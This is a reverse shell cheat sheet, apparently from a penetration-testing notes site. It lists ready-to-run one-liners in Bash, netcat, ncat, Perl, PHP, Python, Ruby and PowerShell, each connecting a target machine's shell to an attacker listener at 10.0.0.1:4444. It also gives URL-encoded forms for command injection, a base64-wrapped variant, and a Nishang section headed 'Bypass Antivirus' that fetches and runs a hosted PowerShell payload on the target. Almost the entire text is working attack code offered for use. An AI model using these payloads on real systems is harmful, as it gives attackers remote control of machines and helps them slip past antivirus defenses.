Reverse Shell Cheat Sheet

Last modified: 2023-09-15

Privilege Escalation Reverse Shell Windows

First of all, we need to start a listener in local machine to get an incoming connection.

nc -lvnp 4444

Bash

bash -i >&  /dev/tcp/10.0.0.1/4444 0>&1
bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'
/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'

# For URL param
/?q=bash+-i+>%26+/dev/tcp/10.0.0.1/4444+0>%261
/?q=`bash+-c+'bash+-i+>%26+/dev/tcp/10.0.0.1/4444+0>%261'`

with Base64

Execute the following commands in target machine.

echo "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1" | base64
echo <base64_string> | base64 -d | bash

Netcat OpenBSD

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f

Ncat

ncat 10.0.0.1 4444 -e /bin/bash
ncat 10.0.0.1 4444 -e /bin/sh
ncat 10.0.0.1 4444 -c bash
ncat --udp 10.0.0.1 4444 -e /bin/bash

nc 10.0.0.1 4444 -e /bin/bash
nc 10.0.0.1 4444 -e /bin/sh
nc 10.0.0.1 4444 -c bash
nc --udp 10.0.0.1 4444 -e /bin/bash

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PHP

php -r '$sock=fsockopen("10.0.0.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Python

python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.0.0.1", 4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PowerShell

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Bypass Antivirus


Nishang

Nishang is the Offensive PowerShell for red team, penetration testing and offensive security.

1. Preparing the Payload in Your Local Machine

First off, copy the payload to the current working directory.

cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1

Add the following code to the final line in the payload (shell.ps1).

Invoke-PowerShellTcp -Reverse  -IPAddress <your-local-ip> -Port 4444

2. Opening Wev Server in Your Local Machine

To download the payload and execute the reverse shell in the target machine, open the web server in your local machine.

python3 -m http.server 8000

3. Downloading the Payload and Executing Reverse Shell

In the target machine, download the local-hosted payload and run reverse shell.

cmd /c powershell IEX (New-Object Net.WebClient).DownloadString('http://<your-local-ip>:8000/shell.ps1')